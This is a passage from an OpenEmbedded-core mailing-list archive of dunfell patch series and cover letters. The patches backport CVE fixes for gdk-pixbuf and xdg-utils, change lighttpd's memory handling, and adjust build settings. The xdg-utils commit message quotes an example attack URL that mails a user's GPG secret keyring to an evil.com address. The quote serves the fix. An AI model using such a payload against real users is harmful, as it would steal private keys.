+Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ 
+         /* If no rendered frame, render the first frame */
+         if (anim->last_frame == NULL) {
++                gsize len = 0;
+                 if (anim->last_frame_data == NULL)
+                         anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+                 if (anim->last_frame_data == NULL)
+                         return NULL;
+-                memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++                if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++                        memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++                else
++                        return NULL;
+                 composite_frame (anim, g_list_nth_data (anim->frames, 0));
+         }
+ 
+-- 
+GitLab
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 54861e83c6..60a04c3581 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -25,6 +25,7 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
            file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
            file://missing-test-data.patch \
            file://CVE-2020-29385.patch \
+           file://CVE-2021-20240.patch \
            "
 
 SRC_URI_append_class-target = " \
-- 
2.25.1

[OE-core][dunfell 2/5] xdg-utils: Add fix for CVE-2020-27748

[Steve Sakoman]

From: Richard Purdie <richard.purdie@linuxfoundation.org>

Backport an upstream patch for the CVE.

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 87191ed0303f6552865ad1edcacd674c57f2010c)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 ...9813e0eb0246f63b54e9e154970e609575af.patch | 58 +++++++++++++++++++
 .../xdg-utils/xdg-utils_1.1.3.bb              |  1 +
 2 files changed, 59 insertions(+)
 create mode 100644 meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch

diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+ 
+ run_thunderbird()
+ {
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+     THUNDERBIRD="$1"
+     MAILTO=$(echo "$2" | sed 's/^mailto://')
+     echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+     BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+     SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+     BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-    ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+ 
+     if [ -z "$TO" ] ; then
+         NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+         NEWMAILTO="${NEWMAILTO},$BODY"
+     fi
+ 
+-    if [ -n "$ATTACH" ] ; then
+-        NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+-    fi
+-
+     NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+     DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+     "$THUNDERBIRD" -compose "$NEWMAILTO"
+-- 
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..41b74b8598 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
            file://0001-Reinstate-xdg-terminal.patch \
            file://0001-Don-t-build-the-in-script-manual.patch \
+           file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
           "
 
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
-- 
2.25.1

[OE-core][dunfell 3/5] lighttpd: Add patch for reuse large memory chunks

[Steve Sakoman]

From: Purushottam Choudhary <purushottamchoudhary29@gmail.com>

Added 0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
to fix large memory usage for large file downloads
from dynamic backends reuse or release large memory chunks.

Also, added patch to set default chunk size 8k earlier it was 4k.

This issue is caused by a bug in the lighttpd 1.4.55 version and
has been fixed in lighttpd 1.4.58. Hence, it is not needed for
master and hardknott branch because lighttpd has 1.4.59 version.

Link: https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
Link: https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855

Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 ...or-pcre-dependency-instead-of-config.patch |  10 +-
 ...-mem-chunks-fix-mem-usage-fixes-3033.patch | 224 ++++++++++++++++++
 .../lighttpd/default-chunk-size-8k.patch      |  35 +++
 .../lighttpd/lighttpd_1.4.55.bb               |   2 +
 4 files changed, 265 insertions(+), 6 deletions(-)
 create mode 100644 meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
 create mode 100644 meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch

diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
-From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001
+From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
 From: Alexander Kanavin <alex.kanavin@gmail.com>
 Date: Fri, 26 Aug 2016 18:20:32 +0300
 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
 RP 2014/5/22
 Upstream-Status: Pending
 Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
 ---
  configure.ac | 16 ++++++++++++----
  1 file changed, 12 insertions(+), 4 deletions(-)
 
 diff --git a/configure.ac b/configure.ac
-index 5383cec..c29a902 100644
+index dbddfb9..62cf17f 100644
 --- a/configure.ac
 +++ b/configure.ac
-@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre],
+@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
  )
  AC_MSG_RESULT([$WITH_PCRE])
  
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
    else
      AC_PATH_PROG([PCRECONFIG], [pcre-config])
      if test -n "$PCRECONFIG"; then
--- 
-2.15.0
-
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+  "Memory Growth with PUT and full buffered streams"
+  https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backword compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c            | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h            |  2 +
+ src/http-header-glue.c |  2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ 
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+-    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++    size_t x = 1024;
++    while (x < sz && x < (1u << 30)) x <<= 1;
++    chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+ 
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++    chunk_buf_sz = 8192;
+     chunkqueue_default_tempdirs = NULL;
+     chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ 	free(c);
+ }
+ 
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++    /* future: might have buckets of certain sizes, up to socket buf sizes */
++    if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++        --chunks_oversized_n;
++        chunk *c = chunks_oversized;
++        chunks_oversized = c->next;
++        return c;
++    }
++    return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++    if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++        ++chunks_oversized_n;
++        chunk **co = &chunks_oversized;
++        while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++        c->next = *co;
++        *co = c;
++    }
++    else
++        chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+     chunk *c;
+     buffer *b;
+-    if (chunks) {
+-        c = chunks;
+-        chunks = c->next;
++    if (sz <= chunk_buf_sz) {
++        if (chunks) {
++            c = chunks;
++            chunks = c->next;
++        }
++        else
++            c = chunk_init(chunk_buf_sz);
++            /* future: might choose to pop from chunks_oversized, if available
++             * (even if larger than sz) rather than allocating new chunk
++             * (and if doing so, might replace chunks_oversized_n) */
+     }
+     else {
+-        c = chunk_init(chunk_buf_sz);
++        /*(round up to nearest chunk_buf_sz)*/
++        sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++        c = chunk_pop_oversized(sz);
++        if (NULL == c)
++            c = chunk_init(sz);
+     }
+     c->next = chunk_buffers;
+     chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+     return b;
+ }
+ 
++buffer * chunk_buffer_acquire(void) {
++    return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+     if (NULL == b) return;
+-    if (b->size >= chunk_buf_sz && chunk_buffers) {
++    if (chunk_buffers) {
+         chunk *c = chunk_buffers;
+         chunk_buffers = c->next;
+         c->mem = b;
+-        c->next = chunks;
+-        chunks = c;
+         buffer_clear(b);
++        if (b->size == chunk_buf_sz) {
++            c->next = chunks;
++            chunks = c;
++        }
++        else if (b->size > chunk_buf_sz)
++            chunk_push_oversized(c, b->size);
++        else
++            chunk_free(c);
+     }
+     else {
+         buffer_free(b);
+     }
+ }
+ 
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++    if (sz > chunk_buffer_string_space(b)) {
++        sz += b->used ? b->used : 1;
++        buffer * const cb = chunk_buffer_acquire_sz(sz);
++        /* swap buffer contents and copy original b->ptr into larger b->ptr */
++        /*(this does more than buffer_move())*/
++        buffer tb = *b;
++        *b = *cb;
++        *cb = tb;
++        if ((b->used = tb.used))
++            memcpy(b->ptr, tb.ptr, tb.used);
++        chunk_buffer_release(cb);
++    }
++    return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+     if (sz <= chunk_buf_sz) {
+         if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+         sz = chunk_buf_sz;
+     }
+     else {
+-        sz = (sz + 8191) & ~8191uL;
+-        /* future: might have buckets of certain sizes, up to socket buf sizes*/
+-        if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+-            chunk *c = chunks_oversized;
+-            chunks_oversized = c->next;
+-            return c;
+-        }
++        /*(round up to nearest chunk_buf_sz)*/
++        sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++        chunk *c = chunk_pop_oversized(sz);
++        if (c) return c;
+     }
+ 
+     return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+     }
+     else if (sz > chunk_buf_sz) {
+         chunk_reset(c);
+-        chunk **co = &chunks_oversized;
+-        while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+-        c->next = *co;
+-        *co = c;
++        chunk_push_oversized(c, sz);
+     }
+     else {
+         chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+         chunk_free(c);
+     }
+     chunks_oversized = NULL;
++    chunks_oversized_n = 0;
+ }
+ 
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+ 
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+ 
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+         if (avail < toread) {
+             /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+             avail = avail ? avail - 1 + toread : toread;
+-            buffer_string_prepare_append(b, avail);
++            avail = chunk_buffer_prepare_append(b, avail);
+         }
+ 
+         n = read(fd, b->ptr+buffer_string_length(b), avail);
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+ 
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ 
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+-    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+ 
+ void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 35a268a03f..737d6ebf7c 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -18,6 +18,8 @@ SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.t
         file://lighttpd.conf \
         file://lighttpd \
         file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
+        file://default-chunk-size-8k.patch \
+        file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
         "
 
 SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
-- 
2.25.1

[OE-core][dunfell 4/5] oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines

[Steve Sakoman]

From: Richard Purdie <richard.purdie@linuxfoundation.org>

This log checking fix is needed for both qemux86 and qemux86-64 so move
to the common section.

[YOCTO #14528]

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 2475ce68f0bc1f342c75364dfcfaf7f30499badf)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/lib/oeqa/runtime/cases/parselogs.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index 88279c6013..138fc306fc 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -90,6 +90,7 @@ qemux86_common = [
     "glamor initialization failed",
     "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
     "floppy: error",
+    'failed to IDENTIFY (I/O error, err_mask=0x4)',
 ] + common_errors
 
 ignore_errors = {
@@ -97,7 +98,6 @@ ignore_errors = {
     'qemux86' : [
         'Failed to access perfctr msr (MSR',
         'pci 0000:00:00.0: [Firmware Bug]: reg 0x..: invalid BAR (can\'t size)',
-        'failed to IDENTIFY (I/O error, err_mask=0x4)',
         ] + qemux86_common,
     'qemux86-64' : qemux86_common,
     'qemumips' : [
-- 
2.25.1

[OE-core][dunfell 5/5] default-distrovars.inc: Set BBINCLUDELOGS to empty to disable printing failed task output multiple times

[Steve Sakoman]

From: Martin Jansa <Martin.Jansa@gmail.com>

* the output is shown 3 times with default configuration and 5 times when --verbose
  is being used with knotty, there might be other use-cases where we actually need
  this, but until the logging is resolved better, setting this to empty looks like
  more reasonable option (considering that e.g. log.do_compile from chromium-x11
  can be over 50MB long, generating 150MB+ cooker log)

* more details in:
  https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542

Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit ede2e0df7982777212b8c25195d41ce9e57562b5)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/conf/distro/include/default-distrovars.inc | 6 ++++--
 meta/conf/documentation.conf                    | 2 +-
 2 files changed, 5 insertions(+), 3 deletions(-)

diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..e266d0f312 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -27,8 +27,10 @@ BB_GENERATE_MIRROR_TARBALLS ??= "0"
 
 NO32LIBS ??= "1"
 
-# Default to emitting logfiles if a build fails.
-BBINCLUDELOGS ??= "yes"
+# Default logger already emits logfiles if a build fails, setting this to any non-empty value would just include more copies (prefixed with "|") in the output
+# https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542
+BBINCLUDELOGS ??= ""
+
 SDK_VERSION ??= "nodistro.0"
 DISTRO_VERSION ??= "nodistro.0"
 
diff --git a/meta/conf/documentation.conf b/meta/conf/documentation.conf
index b48cbd4ac0..a6746e863f 100644
--- a/meta/conf/documentation.conf
+++ b/meta/conf/documentation.conf
@@ -88,7 +88,7 @@ BBFILE_COLLECTIONS[doc] = "Lists the names of configured layers. These names are
 BBFILE_PATTERN[doc] = "Variable that expands to match files from BBFILES in a particular layer. This variable is used in the layer.conf file and must be suffixed with the name of a layer."
 BBFILE_PRIORITY[doc] = "Assigns the priority for recipe files in each layer. Setting this variable allows you to prioritize a layer against other layers that contain the same recipe."
 BBFILES[doc] = "List of recipe files used by BitBake to build software."
-BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure."
+BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure. Set to empty if you don't want to have 2nd copy of failed task output (prefixed with '|') in the cooker log."
 BBINCLUDELOGS_LINES[doc] = "Amount of log lines printed on failure."
 BBLAYERS[doc] = "Lists the layers to enable during the build. This variable is defined in the bblayers.conf configuration file."
 BBMASK[doc] = "Prevents BitBake from processing specific recipes or recipe append files."
-- 
2.25.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of patches for dunfell and have comments back by
end of day Friday.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/4259

The following changes since commit f547c9610f8c17c3da9ca3f7a79902d2ffbfca49:

  qemu: Add PACKAGECONFIG for brlapi (2022-09-20 11:09:59 -1000)

are available in the Git repository at:

  git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Bruce Ashfield (2):
  linux-yocto/5.4: update to v5.4.212
  linux-yocto/5.4: update to v5.4.213

Lee Chee Yang (1):
  subversion: fix CVE-2021-28544

Sana Kazi (1):
  sqlite3: Fix CVE-2021-20223

Virendra Thakur (1):
  expat: Fix CVE-2022-40674

 .../expat/expat/CVE-2022-40674.patch          |  53 +++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |   1 +
 .../subversion/CVE-2021-28544.patch           | 146 ++++++++++++++++++
 .../subversion/subversion_1.13.0.bb           |   1 +
 .../linux/linux-yocto-rt_5.4.bb               |   6 +-
 .../linux/linux-yocto-tiny_5.4.bb             |   8 +-
 meta/recipes-kernel/linux/linux-yocto_5.4.bb  |  22 +--
 .../sqlite/files/CVE-2021-20223.patch         |  23 +++
 meta/recipes-support/sqlite/sqlite3_3.31.1.bb |   1 +
 9 files changed, 243 insertions(+), 18 deletions(-)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-40674.patch
 create mode 100644 meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
 create mode 100644 meta/recipes-support/sqlite/files/CVE-2021-20223.patch

-- 
2.25.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of changes for dunfell and have comments back by 
end of day Friday.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/5460

The following changes since commit 96798603273bbab40a7e19bbb67a9a5398648c21:

  openssh: Move sshdgenkeys.service to sshd.socket (2023-06-07 05:49:27 -1000)

are available in the Git repository at:

  https://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Martin Siegumfeldt (1):
  systemd-systemctl: fix instance template WantedBy symlink construction

Nikhil R (1):
  libwebp: Fix CVE-2023-1999

Qiu Tingting (1):
  e2fsprogs: fix ptest bug for second running

Randy MacLeod (1):
  vim: upgrade 9.0.1429 -> 9.0.1527

Richard Purdie (1):
  selftest/reproducible: Allow native/cross reuse in test

 meta/lib/oeqa/selftest/cases/reproducible.py  |  4 +-
 .../systemd/systemd-systemctl/systemctl       | 13 ++++-
 .../e2fsprogs/e2fsprogs/run-ptest             |  1 +
 .../e2fsprogs/e2fsprogs_1.45.7.bb             |  3 +
 .../webp/files/CVE-2023-1999.patch            | 55 +++++++++++++++++++
 meta/recipes-multimedia/webp/libwebp_1.1.0.bb |  4 ++
 meta/recipes-support/vim/vim.inc              |  4 +-
 7 files changed, 77 insertions(+), 7 deletions(-)
 create mode 100644 meta/recipes-multimedia/webp/files/CVE-2023-1999.patch

-- 
2.34.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of changes for dunfell and have comments back by
end of day Wednesday, September 6.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/5815

The following changes since commit 3575290c4cc937ae2f2c5604a5619ac6de9aa071:

  grub2.inc: remove '-O2' from CFLAGS (2023-08-27 06:30:22 -1000)

are available in the Git repository at:

  https://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Ross Burton (3):
  linux-yocto: add script to generate kernel CVE_CHECK_WHITELIST entries
  linux/cve-exclusion: add generated CVE_CHECK_WHITELISTs
  linux/cve-exclusion: remove obsolete manual entries

Vijay Anusuri (2):
  inetutils: Backport fix for CVE-2023-40303
  go: Backport fix for CVE-2023-29409

 ...tpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch |  283 +
 ...03-Indent-changes-in-previous-commit.patch |  254 +
 .../inetutils/inetutils_1.9.4.bb              |    2 +
 meta/recipes-devtools/go/go-1.14.inc          |    1 +
 .../go/go-1.14/CVE-2023-29409.patch           |  175 +
 meta/recipes-kernel/linux/cve-exclusion.inc   | 1827 -----
 .../linux/cve-exclusion_5.4.inc               | 7164 +++++++++++++++++
 .../linux/generate-cve-exclusions.py          |  101 +
 meta/recipes-kernel/linux/linux-yocto_5.4.bb  |    1 +
 9 files changed, 7981 insertions(+), 1827 deletions(-)
 create mode 100644 meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
 create mode 100644 meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
 create mode 100644 meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
 create mode 100644 meta/recipes-kernel/linux/cve-exclusion_5.4.inc
 create mode 100755 meta/recipes-kernel/linux/generate-cve-exclusions.py

-- 
2.34.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of changes for dunfell and have comments back by
end of day Thursday, December 21

Passed a-full on autobuilder:

